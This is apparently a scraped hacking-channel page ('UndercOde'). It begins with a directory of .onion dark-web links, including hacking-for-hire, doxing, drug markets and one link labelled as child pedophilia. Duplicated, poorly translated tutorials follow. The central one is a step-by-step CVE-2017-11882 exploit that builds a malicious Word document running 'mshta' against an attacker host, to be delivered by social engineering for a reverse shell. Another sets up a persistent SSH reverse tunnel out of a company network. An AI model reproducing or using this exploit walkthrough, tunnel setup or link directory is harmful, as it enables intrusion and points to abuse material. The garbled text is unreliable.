http://zbnnr7qzaxlk5tms.onion/ β Wiki Leaks
Hacking
http://salted7fpnlaguiq.onion/ β SALT
http://yj5rbziqttulgidy.onion/ β Itanimulli
http://bbxdfsru7lmmbj32.onion/marketplace/ β Delta Initiative
http://2ogmrlfzdthnwkez.onion/ β Rent-A-Hacker
Warez
http://2gxxzwnj52jutais.onion/ β The Nowhere Server (restored from backup after FH)
http://jntlesnev5o7zysa.onion/ β The Pirate Bay β Torrents
http://am4wuhz3zifexz5u.onion/ β Tor Library β library of books and other media files
http://uj3wazyk5u4hnvtk.onion/ β The Pirate Bay β Torrents (official .onion)
http://doxbindtelxceher.onion/ β DOXBIN
http://wuvdsbmbwyjzsgei.onion/ β Music Downloads
http://lolicore75rq3tm5.onion/ β Lolicore and Speedcore Music
http://xfmro77i3lixucja.onion/ β ebooks
http://vt27twhtksyvjrky.onion/ β lol 20th Century Western Music Recordings and Scores
http://2ygbaoezjdmacnro.onion/ β Pony at Noisebridge
http://xfmro77i3lixucja.onion/ β Imperial Library of Trantor
http://c3jemx2ube5v5zpg.onion/ β Jotunbaneβs Reading Club
Drugs Non-commercial
No links found.
Erotic 18+
http://tklxxs3rdzdjppnl.onion/sharepass/ β SharePass β Password sharing community
http://k4jmdeccpnsfe43c.onion/ β Girls Released β Some nice model pics
http://54dgeda4ik6iypui.onion/ β Gallery β Met-Art, FTVX etc sets
http://pinkmethuylnenlz.onion/ β The Pink Meth (mirror)
http://2fqgjzbb2h7yevom.onion/klixen/ β Klixen
http://orsxvca7glswueo7.onion/ β EroDir β Lots and lots of Hentai
http://mmgh3rqeswrlgzdr.onion/ β VOR-COM
Erotic Hard Candy
Hard candy links no longer working and removed.
Erotic Jailbait
Non-English
http://germanyhusicaysx.onion β Deutschland im Deep Web β German forum
http://ffi5v46ttwgx3fby.onion/ β Das ist Deutschland hier 2.0 β German Board
http://paisleli66axejos.onion/ β PAIS
http://hyjmkmb3lfymiprp.onion/hen/papieze/ β DzieciΔca pedofilia
http://runionv62ul3roit.onion/ β Russian Onion Union
http://s6cco2jylmxqcdeh.onion/ β ?ltimos bumps
http://5xki35vc4g5ts6gc.onion β GTF Greek Tor Forum . For greek speaking users
http://cipollatnumrrahd.onion/index.php β Cipolla 2.0 β Italian Community
http://runionv62ul3roit.onion β Russian community: market and anonymous talks about security, guns etc.
http://ptrackcp2noqu5fh.onion/ β PoliceTrack β Ne vous faites plus suivre par la police.
http://amberoadychffmyw.onion β Amberoad β russian anonymous market
http://r2d2akbw3jpt4zbf.onion β R2D2 β russian anonymous market
http://ramp2bombkadwvgz.onion β RAMP β biggest russian market (drugs only)
http://szmyt4v4vjbnxpg3.onion/ β Π‘Π»Π°Π²ΡΠ½ΡΠΊΠΈΠΉ
http://o2tu5zjxjlibrary.onion/ β Bibliotheca Alexandrina
http://xzzpowtjlobho6kd.onion/wordpress/ β DeepBlog
http://zqiirytam276uogb.onion/ β Thorlauta
http://ocbh4hoqs37unvv6.onion β French Deep Web
For More
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
ENJOY BY UNDER CODE # ANY DOUBT FEEL FREE TO ASK # ALL FREE
π¦ The Carding Tutorials Posted by UnderCode Powered by Trusted DeepWebsites, So don t be a shit Hacker by Cloning Our Tutorials
# Use Only For Learning
# Use Only For Learning
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is X-Helper Virus ? and why is dangerous ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) xHelper is an Android malware that was detected by security vendor Malwarebytes in May 2019. This is a covert malware removal program. Even after the user restores the factory settings, the malware will be re-infected, causing continuous trouble to users around the world.
2) Malwarebytes' security researchers have been studying the threat, and in a recent blog post, the team stated that, although it has not been clear how the malware reinstalls itself, they have indeed found sufficient information about how it operates. Information to permanently delete it and prevent xHelper from reinstalling itself after a factory reset.
3) According to the Malwarebytes team, xHelper found a way to use a process in the Google Play Store app to trigger a reinstall. With a special directory created on the device, xHelper can hide its Android application package (APK) on disk. Unlike apps, their directories and files remain on Android mobile devices even after a factory reset. Therefore, the device will continue to be infected until the directories and files are deleted.
4) Malwarebytes explained in its analysis of the malware, "Google Play is not infected with malware. However, certain events in Google Play triggered a re-infection-it could be something is being stored. In addition, some things may Google Play acts as a smoke screen, disguising itself as a source of malware installation, when it actually comes from elsewhere. "
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is X-Helper Virus ? and why is dangerous ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) xHelper is an Android malware that was detected by security vendor Malwarebytes in May 2019. This is a covert malware removal program. Even after the user restores the factory settings, the malware will be re-infected, causing continuous trouble to users around the world.
2) Malwarebytes' security researchers have been studying the threat, and in a recent blog post, the team stated that, although it has not been clear how the malware reinstalls itself, they have indeed found sufficient information about how it operates. Information to permanently delete it and prevent xHelper from reinstalling itself after a factory reset.
3) According to the Malwarebytes team, xHelper found a way to use a process in the Google Play Store app to trigger a reinstall. With a special directory created on the device, xHelper can hide its Android application package (APK) on disk. Unlike apps, their directories and files remain on Android mobile devices even after a factory reset. Therefore, the device will continue to be infected until the directories and files are deleted.
4) Malwarebytes explained in its analysis of the malware, "Google Play is not infected with malware. However, certain events in Google Play triggered a re-infection-it could be something is being stored. In addition, some things may Google Play acts as a smoke screen, disguising itself as a source of malware installation, when it actually comes from elsewhere. "
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Method to remove xHelper Virus :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
It is worth noting that the following removal steps rely on the user to install the Malwarebytes app for Android, but the app is free to use.
> The specific deletion steps are as follows:
1) Install a file manager from Google PLAY, which can search for files and directories.
2) Amelia uses ASTRO's File Manager.
3) Disable Google PLAY temporarily to stop reinfection.
4) Go to Settings> Apps> Google Play Store
5) Press the disable button to run a scan in Malwarebytes for Android to remove xHelper and other malware.
6) Manual uninstallation can be difficult, but the names to look for in the Application information are fireway, xhelper, and Settings (only if two settings applications are displayed). Open the file manager and search for anything that starts with com.mufc .
If found, note the last modified date.
> Pro tip: Sort by date in file manager
7) In ASTRO's file manager, you can delete everything starting with com.mufc sorted by date under view settings . And anything with the same date (except for core directories such as Download):
8) now Re-enable Google PLAY
9) Go to Settings> Apps> Google Play Store
10) Press the enable button
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Method to remove xHelper Virus :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
It is worth noting that the following removal steps rely on the user to install the Malwarebytes app for Android, but the app is free to use.
> The specific deletion steps are as follows:
1) Install a file manager from Google PLAY, which can search for files and directories.
2) Amelia uses ASTRO's File Manager.
3) Disable Google PLAY temporarily to stop reinfection.
4) Go to Settings> Apps> Google Play Store
5) Press the disable button to run a scan in Malwarebytes for Android to remove xHelper and other malware.
6) Manual uninstallation can be difficult, but the names to look for in the Application information are fireway, xhelper, and Settings (only if two settings applications are displayed). Open the file manager and search for anything that starts with com.mufc .
If found, note the last modified date.
> Pro tip: Sort by date in file manager
7) In ASTRO's file manager, you can delete everything starting with com.mufc sorted by date under view settings . And anything with the same date (except for core directories such as Download):
8) now Re-enable Google PLAY
9) Go to Settings> Apps> Google Play Store
10) Press the enable button
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some APP Names, removed from playstore for Malwares detection :
After Google got a heads-up from a Forbes writer on Tuesday, it yanked all of the 24 apps in the network from the Play store. These are the apps that it removed:
instagram.com/UndercOdeTestingCompany
1) HI VPN, Free VPN
2) Soccer Pinball
3) Dig It
4) Laser Break
5) Word Crush
6) Music Roam
7) Word Crossy!
8) Puzzle Box
9) World Zoo
10) Private Browser
11) Calendar Lite
12) Turbo Browser
13) Joy Launcher
14) Virus Cleaner 2019
15) Super Cleaner
16) Hi Security 2019
17) Candy Selfie Camera
18) Super Battery
19) Candy Gallery
20) Hi VPN Pro
21) Net Master
22) filemanager
23) Sound Recorder
24) Weather Forecast
π¦ Google had this to say about reports of the appsβ security and privacy violations:
Examples include that time in September 2019, when we heard about fleeceware in the Play Store that was automatically charging up to $250 to continue using it beyond its three-day trial period.
>As weβve noted before when covering rogue apps in Play Store, Google often doesnβt seem to notice the problem at all until researchers report the apps for malicious or exploitative behavior.
>Unfortunately, bad apps often fall through the automatic screening in the app stores if they themselves donβt flagrantly pull malicious stunts but instead pave the way for a deviceβs compromise, as pointed out by SophosLabs malware analyst Jagadeesh Chandraiah
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some APP Names, removed from playstore for Malwares detection :
After Google got a heads-up from a Forbes writer on Tuesday, it yanked all of the 24 apps in the network from the Play store. These are the apps that it removed:
instagram.com/UndercOdeTestingCompany
1) HI VPN, Free VPN
2) Soccer Pinball
3) Dig It
4) Laser Break
5) Word Crush
6) Music Roam
7) Word Crossy!
8) Puzzle Box
9) World Zoo
10) Private Browser
11) Calendar Lite
12) Turbo Browser
13) Joy Launcher
14) Virus Cleaner 2019
15) Super Cleaner
16) Hi Security 2019
17) Candy Selfie Camera
18) Super Battery
19) Candy Gallery
20) Hi VPN Pro
21) Net Master
22) filemanager
23) Sound Recorder
24) Weather Forecast
π¦ Google had this to say about reports of the appsβ security and privacy violations:
Examples include that time in September 2019, when we heard about fleeceware in the Play Store that was automatically charging up to $250 to continue using it beyond its three-day trial period.
>As weβve noted before when covering rogue apps in Play Store, Google often doesnβt seem to notice the problem at all until researchers report the apps for malicious or exploitative behavior.
>Unfortunately, bad apps often fall through the automatic screening in the app stores if they themselves donβt flagrantly pull malicious stunts but instead pave the way for a deviceβs compromise, as pointed out by SophosLabs malware analyst Jagadeesh Chandraiah
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Office Memory Corruption Vulnerability CVE-2017-11882 Failed to execute arbitrary code, DoS PoC has been released:
fb.com/UndercOdeTestingCompany
1) Microsoft Office once again revealed a memory corru:ption vulnerabilityβ , CVEID CVE-2017-11882β , which can be exploited by an attacker to execute arbitrary code in the context of the currently logged-in user.
2) A failed development attempt may cause a denial of service condition. The affected versions include related versions of Office 2016, Office 2013, Office 2010, and Office 2007.
3) Update: The Microsoft Office Memory Corruption Vulnerability CVE-2017-11882 PoC has been released. The reason it is widely spread is that this vulnerability has no sputum, and users cannot feel it! !! !! Here is a simple reproduction for everyone. .
π¦ Tools used:
1) Infiltration tool: kodiac (used to construct the payload and get the shell) Tool address: https://github.com/weiruyi123/koadic (This is the version I modified without coding errors)
2) Vulnerability Poc: Address: https://github.com/weiruyi123/CVE-2017-11882
(Poc has a limit on the command length. For details, please refer to the README on github.)
π¦ Operating environment:
1) Python2.7
2) Target: windows server 2008 R2 standard IP: 192.168.1.171
3) Attack machine: A VPS with a public IP (because I don't want to do forwarding, I use the VPS as a rebound shell service to show everyone)
4) Enter bash, cd into the downloaded Poc directory, we can see that Poc is written in python, so you need to install the python environment.
Next we open the win server virtual machine
5) Newly installed virtual machine (without any patches).
Here I use ssh to link my vps and use git clone to download kodiac. After recursively adding execute permissions to the directory, cd into the kodiac directory and then. /kodiac.py runs, the same tool also requires a python environment
6)Then we set the LHOST and LPORT mosaics and fill in your intranet IP address (if it is an intranet penetration) or port forwarding address, and then enter run to generate the payload
7) Copy 'mshta http: // IP: 2580 / acg9N' and then go back to bash to open the Poc directory. The usage of Poc is
python Command_CVE-2017-11882.py -c "cmd.exe / c calc.exe" -o test.doc
-c refers to the command executed remotely -o refers to the generated document location. We modify the command and save location at -c according to the situation, here according to the payload command I generated is
python Command_CVE-2017-11882.py -c "mshta http: // IP: 2580 / acg9N" -o test.doc
Of course, you can also use msf to generate a powershell one-sentence payload and then replace the parameter at -c
8) It can be seen that we have successfully generated a malicious document (check picture sended by UndercOde
9) Next, you only need to open it through some social workers or abnormal means. we will open the document into the win server virtual machine.
10) Then you will find that the zombies shell with code 0 has been rebounded at kodiac, and there is no error message after the target is opened
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Office Memory Corruption Vulnerability CVE-2017-11882 Failed to execute arbitrary code, DoS PoC has been released:
fb.com/UndercOdeTestingCompany
1) Microsoft Office once again revealed a memory corru:ption vulnerabilityβ , CVEID CVE-2017-11882β , which can be exploited by an attacker to execute arbitrary code in the context of the currently logged-in user.
2) A failed development attempt may cause a denial of service condition. The affected versions include related versions of Office 2016, Office 2013, Office 2010, and Office 2007.
3) Update: The Microsoft Office Memory Corruption Vulnerability CVE-2017-11882 PoC has been released. The reason it is widely spread is that this vulnerability has no sputum, and users cannot feel it! !! !! Here is a simple reproduction for everyone. .
π¦ Tools used:
1) Infiltration tool: kodiac (used to construct the payload and get the shell) Tool address: https://github.com/weiruyi123/koadic (This is the version I modified without coding errors)
2) Vulnerability Poc: Address: https://github.com/weiruyi123/CVE-2017-11882
(Poc has a limit on the command length. For details, please refer to the README on github.)
π¦ Operating environment:
1) Python2.7
2) Target: windows server 2008 R2 standard IP: 192.168.1.171
3) Attack machine: A VPS with a public IP (because I don't want to do forwarding, I use the VPS as a rebound shell service to show everyone)
4) Enter bash, cd into the downloaded Poc directory, we can see that Poc is written in python, so you need to install the python environment.
Next we open the win server virtual machine
5) Newly installed virtual machine (without any patches).
Here I use ssh to link my vps and use git clone to download kodiac. After recursively adding execute permissions to the directory, cd into the kodiac directory and then. /kodiac.py runs, the same tool also requires a python environment
6)Then we set the LHOST and LPORT mosaics and fill in your intranet IP address (if it is an intranet penetration) or port forwarding address, and then enter run to generate the payload
7) Copy 'mshta http: // IP: 2580 / acg9N' and then go back to bash to open the Poc directory. The usage of Poc is
python Command_CVE-2017-11882.py -c "cmd.exe / c calc.exe" -o test.doc
-c refers to the command executed remotely -o refers to the generated document location. We modify the command and save location at -c according to the situation, here according to the payload command I generated is
python Command_CVE-2017-11882.py -c "mshta http: // IP: 2580 / acg9N" -o test.doc
Of course, you can also use msf to generate a powershell one-sentence payload and then replace the parameter at -c
8) It can be seen that we have successfully generated a malicious document (check picture sended by UndercOde
9) Next, you only need to open it through some social workers or abnormal means. we will open the document into the win server virtual machine.
10) Then you will find that the zombies shell with code 0 has been rebounded at kodiac, and there is no error message after the target is opened
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Intranet penetration using SSH reverse tunnel FULL BY UndercOde :
twitter.com/UndercOdeTC
1) No matter it is infiltration or in the open air, intranet penetration is an important link. We and our assigned intranet IP cannot be accessed through the extranet. SSH reverse tunnel for intranet penetration.
2) Suppose machines A and B, A has a public IP, and B is behind NAT and has no available port forwarding. Now I want to initiate an SSH connection to B from A. Because B is behind the NAT, there is no such combination of public IP + port available , so A cannot penetrate NAT. This article deals with this situation. Also encountered by most people.
3) Let's first assume the following machines:
Machine code Machine position address Account ssh / sshd port Do you need to run sshd
A Public network a.site usera twenty two Yes
B Behind NAT localhost userb twenty two Yes
C Behind NAT localhost userc twenty two no
SSH direction tunnel connection
4) This method refers to the active establishment of an SSH tunnel from B to A, which forwards port 6766 of A to port B. As long as the tunnel is not closed, this forwarding is effective. You only need to access A's 6766 port to connect to B in reverse.
π¦ First establish an SSH tunnel on B, and forward port 6676 of A to port 22 of B:
1) B $ ssh -p 22 -qngfNTR 6766: localhost: 22 usera@a.site
Then use 6766 reverse SSH to B on A
2) A $ ssh -p 6766 userb @ localhost
The thing to do is actually that simple.
3) Maintenance of the tunnel
Stability maintenance
> Unfortunately, the SSH connection will be closed overtime. If the connection is closed and the tunnel cannot be maintained, then A cannot use the reverse tunnel to penetrate B's NAT. Therefore, we need a solution to provide a stable SSH To the tunnel.
4) One of the easiest methods is autossh. This software will automatically establish an SSH tunnel after a timeout. This solves the problem of tunnel stability. If you use Arch Linux, you can get it like this:
> $ sudo pacman -S autossh
5) Let's do something similar on B before, except that the tunnel will be maintained by autossh:
> $ autossh -p 22 -M 6777 -NR 6766: localhost: 22 usera@a.site
The port specified by the -M parameter is used to monitor the status of the tunnel and has nothing to do with port forwarding.
6) Then you can access B on port 6766 on A:
> $ ssh -p 6766 user @ localhost
7) Automatic tunnel establishment
However, there is another problem. If B restarts the tunnel, it will disappear. Then there needs to be a means autossh to establish an SSH tunnel each time B starts . One idea is to make the service very natural, then it will be given in systemd a solution under the program.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Intranet penetration using SSH reverse tunnel FULL BY UndercOde :
twitter.com/UndercOdeTC
1) No matter it is infiltration or in the open air, intranet penetration is an important link. We and our assigned intranet IP cannot be accessed through the extranet. SSH reverse tunnel for intranet penetration.
2) Suppose machines A and B, A has a public IP, and B is behind NAT and has no available port forwarding. Now I want to initiate an SSH connection to B from A. Because B is behind the NAT, there is no such combination of public IP + port available , so A cannot penetrate NAT. This article deals with this situation. Also encountered by most people.
3) Let's first assume the following machines:
Machine code Machine position address Account ssh / sshd port Do you need to run sshd
A Public network a.site usera twenty two Yes
B Behind NAT localhost userb twenty two Yes
C Behind NAT localhost userc twenty two no
SSH direction tunnel connection
4) This method refers to the active establishment of an SSH tunnel from B to A, which forwards port 6766 of A to port B. As long as the tunnel is not closed, this forwarding is effective. You only need to access A's 6766 port to connect to B in reverse.
π¦ First establish an SSH tunnel on B, and forward port 6676 of A to port 22 of B:
1) B $ ssh -p 22 -qngfNTR 6766: localhost: 22 usera@a.site
Then use 6766 reverse SSH to B on A
2) A $ ssh -p 6766 userb @ localhost
The thing to do is actually that simple.
3) Maintenance of the tunnel
Stability maintenance
> Unfortunately, the SSH connection will be closed overtime. If the connection is closed and the tunnel cannot be maintained, then A cannot use the reverse tunnel to penetrate B's NAT. Therefore, we need a solution to provide a stable SSH To the tunnel.
4) One of the easiest methods is autossh. This software will automatically establish an SSH tunnel after a timeout. This solves the problem of tunnel stability. If you use Arch Linux, you can get it like this:
> $ sudo pacman -S autossh
5) Let's do something similar on B before, except that the tunnel will be maintained by autossh:
> $ autossh -p 22 -M 6777 -NR 6766: localhost: 22 usera@a.site
The port specified by the -M parameter is used to monitor the status of the tunnel and has nothing to do with port forwarding.
6) Then you can access B on port 6766 on A:
> $ ssh -p 6766 user @ localhost
7) Automatic tunnel establishment
However, there is another problem. If B restarts the tunnel, it will disappear. Then there needs to be a means autossh to establish an SSH tunnel each time B starts . One idea is to make the service very natural, then it will be given in systemd a solution under the program.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Intranet penetration using SSH reverse tunnel FULL BY UndercOde PART 2 : :
twitter.com/UndercOdeTC
ππΌππ πππΈβπ :
π¦"Punch holes"
The reason why the title is this is because I think this thing is a bit similar to UDP hole punching, that is, through a machine on the public network, two machines that are respectively behind each NAT can establish an SSH connection.
1) Here's how to use SSH reverse tunnel to connect C to B.
First edit the configuration file on A , turn on the switch:sshd/etc/ssh/sshd_configGatewayPorts
2) GtaewayPorts yes
Then restart ssh
> A$ sudo systemct1 restart sshd
Then slightly modify the autossh command used on B:
3)B > $ autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' user@a.site
Then use C's port 6676 to connect to B on C:
C $ ssh -p 6766 user@a.site
So far you have easily penetrated the two layers of NAT
π¦ 1) Final solution
Combining the previously mentioned, the final solution is as follows:
2) First turn on the GatewayPorts switch of sshd on A and restart sshd.
3) Then create a new user autossh on B. According to the idea of ββpermission minimization, the autossh service handout on B runs as the user autossh to avoid security problems as much as possible:
1 B $ sudo useradd -m autossh
2 B $ sudo passwd autossh
Then create the SSH key for the autossh user on B and upload it to A:
1 B $ su-autossh
2 B $ ssh-keygen -t; rsa '-C' autossh @ B '
3 B $ ssh-copy-id user@a.site
Be careful not to set a password for this key , that is ssh-keygen , do not enter extra characters despite entering all the way when running the command.
4) Then create a service file called with autossh user privileges on B. Write the following text to the file and set the permissions to 644:autossh/lib/systemd/system/autossh.service
1 [Unit]
2 Description = Auto SSH Tunnel
3 After = network-online.target
4 [Service]
5 User = autossh
6 Type = simple
7 ExecStart = / bin / autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' usera@a.site -i /home/autossh/.ssh/id_rsa
8 ExecReload = / bin / kill -HUP $ MAINPID
9 KillMode = process
10 Restart = always
11 [Install]
12 WantedBy = multi-user.target
13 WantedBy = graphical.target
Setting network-online.target on B takes effect:
5) B $ systemctl enable NetworkManager-wait-online
If you use systemd-networkd and you need to restart the service, it should be systemd-networkd-wait-online. Then set the service to start automatically:
> B $ systemctl enable autossh
If you like, you can start it immediately after this:
> B $ systemctl start autossh
Then you can use this reverse tunnel on A to penetrate B's NAT SSH connection to B:
> C $ ssh -p 6766 user @ localhost
Or SSH to C directly through two layers of NAT:
> C $ ssh -p 6766 user@a.site
If you are familiar with ssh, you can use this tunnel to do more things. For example, you can specify dynamic port forwarding when connecting backwards:
> C $ ssh -p 6766 -qngfNTD 7677 user@site.a
Joining C is your computer, A is your VPS, and B is your company's computer. If you do the above, then the browser port is set to the sock4 local (localhost) proxy of 7677, and you can see the company's webpage in your home browser.
π¦There are some other things in the home that are not useful, everyone knows. . . . .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Intranet penetration using SSH reverse tunnel FULL BY UndercOde PART 2 : :
twitter.com/UndercOdeTC
ππΌππ πππΈβπ :
π¦"Punch holes"
The reason why the title is this is because I think this thing is a bit similar to UDP hole punching, that is, through a machine on the public network, two machines that are respectively behind each NAT can establish an SSH connection.
1) Here's how to use SSH reverse tunnel to connect C to B.
First edit the configuration file on A , turn on the switch:sshd/etc/ssh/sshd_configGatewayPorts
2) GtaewayPorts yes
Then restart ssh
> A$ sudo systemct1 restart sshd
Then slightly modify the autossh command used on B:
3)B > $ autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' user@a.site
Then use C's port 6676 to connect to B on C:
C $ ssh -p 6766 user@a.site
So far you have easily penetrated the two layers of NAT
π¦ 1) Final solution
Combining the previously mentioned, the final solution is as follows:
2) First turn on the GatewayPorts switch of sshd on A and restart sshd.
3) Then create a new user autossh on B. According to the idea of ββpermission minimization, the autossh service handout on B runs as the user autossh to avoid security problems as much as possible:
1 B $ sudo useradd -m autossh
2 B $ sudo passwd autossh
Then create the SSH key for the autossh user on B and upload it to A:
1 B $ su-autossh
2 B $ ssh-keygen -t; rsa '-C' autossh @ B '
3 B $ ssh-copy-id user@a.site
Be careful not to set a password for this key , that is ssh-keygen , do not enter extra characters despite entering all the way when running the command.
4) Then create a service file called with autossh user privileges on B. Write the following text to the file and set the permissions to 644:autossh/lib/systemd/system/autossh.service
1 [Unit]
2 Description = Auto SSH Tunnel
3 After = network-online.target
4 [Service]
5 User = autossh
6 Type = simple
7 ExecStart = / bin / autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' usera@a.site -i /home/autossh/.ssh/id_rsa
8 ExecReload = / bin / kill -HUP $ MAINPID
9 KillMode = process
10 Restart = always
11 [Install]
12 WantedBy = multi-user.target
13 WantedBy = graphical.target
Setting network-online.target on B takes effect:
5) B $ systemctl enable NetworkManager-wait-online
If you use systemd-networkd and you need to restart the service, it should be systemd-networkd-wait-online. Then set the service to start automatically:
> B $ systemctl enable autossh
If you like, you can start it immediately after this:
> B $ systemctl start autossh
Then you can use this reverse tunnel on A to penetrate B's NAT SSH connection to B:
> C $ ssh -p 6766 user @ localhost
Or SSH to C directly through two layers of NAT:
> C $ ssh -p 6766 user@a.site
If you are familiar with ssh, you can use this tunnel to do more things. For example, you can specify dynamic port forwarding when connecting backwards:
> C $ ssh -p 6766 -qngfNTD 7677 user@site.a
Joining C is your computer, A is your VPS, and B is your company's computer. If you do the above, then the browser port is set to the sock4 local (localhost) proxy of 7677, and you can see the company's webpage in your home browser.
π¦There are some other things in the home that are not useful, everyone knows. . . . .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β